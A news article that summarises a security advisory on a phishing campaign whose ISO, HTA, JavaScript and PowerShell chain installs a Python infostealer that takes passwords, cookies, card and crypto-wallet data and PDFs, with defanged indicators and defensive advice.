This new phishing attack uses a sneaky infostealer to cause maximum damage
Security researchers have identified a sophisticated new phishing campaign deploying an unusually comprehensive infostealer designed to exfiltrate a vast array of sensitive data, demonstrating significant advancements in malware capabilities.
Phishing Attack Mechanics
In its advisory, Barracuda Networks details how the attack initiates with a deceptive phishing email claiming to be a purchase order. These emails, sent from a fraudulent account ('yunkun[@]saadelbin[.]com'), lead victims to an attached ISO file, masquerading as legitimate content. Once interacted with, this file extracts an HTA (HTML application) that operates outside browser security restrictions, executing on the desktop.
This HTA file downloads an obfuscated JavaScript, which in turn triggers a PowerShell script. The script's function is to retrieve a ZIP file from a remote server, containing the final payload: a Python-based infostealer.
Infostealer Functionality and Data Collection
The infostealer malware is uniquely notable for its extensive data-stealing capabilities. Beyond common targets such as saved passwords, session cookies, and browsing histories, it aggressively harvests credit card information and cryptocurrency data from browser extensions like MetaMask and Coinbase Wallet. Additionally, it embarks on collecting PDF files from directories like Desktop, Downloads, and Documents by accessing special %AppData% folders.
Once operational, the malware quickly relays the stolen data to multiple email addresses at ‘maternamedical.top’, organized per data type (e.g., cookies, PDF files). Post completion, it self-deletes to evade detection.
Cybersecurity Implications
According to Barracuda, this attack represents a new level in data exfiltration threats. "The sheer volume and sensitivity of the extracted information, from browser data to financial details, presents substantial risks," states Saravanan Mohan, Barracuda's threat analyst manager. Such extensive data harvesting can facilitate further malicious activities such as organizational lateral movement and financial fraud.
In light of these evolving threats, it is crucial for organizations to enforce stringent security measures, including robust cybersecurity protocols, continuous threat monitoring, and educating employees about potential phishing tactics. Additionally, deploying AI and machine learning-based email protection systems can effectively detect and prevent these phishing attempts before they infiltrate user inboxes.
Earlier, SSP wrote that X faced Austrian complaint over AI training practices.